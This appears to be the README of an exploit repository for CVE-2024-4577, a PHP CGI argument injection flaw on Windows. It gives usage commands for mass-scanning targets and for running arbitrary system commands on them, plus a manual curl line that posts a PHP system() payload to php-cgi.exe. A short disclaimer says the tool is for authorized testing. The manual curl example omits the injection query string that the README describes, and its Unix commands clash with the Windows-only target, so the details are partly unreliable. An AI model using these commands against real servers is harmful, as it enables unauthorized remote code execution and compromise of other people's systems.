
Scanner and exploit tool for CVE-2024-4577, a PHP CGI argument injection vulnerability enabling remote code execution on Windows systems. Includes detection and command execution modules.
CVE-2024-4577 is a critical PHP CGI argument injection vulnerability that affects Windows systems running PHP in CGI mode. This flaw allows remote attackers to inject arguments into PHP's command line via specially crafted URLs, leading to remote code execution (RCE).
This repository includes:
CVE-2024-4577.py: A scanner to detect vulnerable targets.exploit.py: An exploit tool that sends PHP code and executes system commands on the vulnerable server.⚠️ DISCLAIMER
This project is for educational and authorized testing only. Any misuse of this code is not the responsibility of the author. Use responsibly and only in environments you own or have explicit permission to test.
requests libraryInstall dependencies:
pip install -r requirements.txt
Detect if a target is vulnerable to CVE-2024-4577:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
The scanner and exploit test common CGI endpoints like:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
The payload bypasses cgi.force_redirect and prepends malicious PHP using php://input.
Execute arbitrary system commands on a vulnerable target:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

You can also exploit the vulnerability manually using curl
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
This sends a PHP payload that executes uname -a on the server and returns the output.

This code is released under the MIT License. See LICENSE for more information.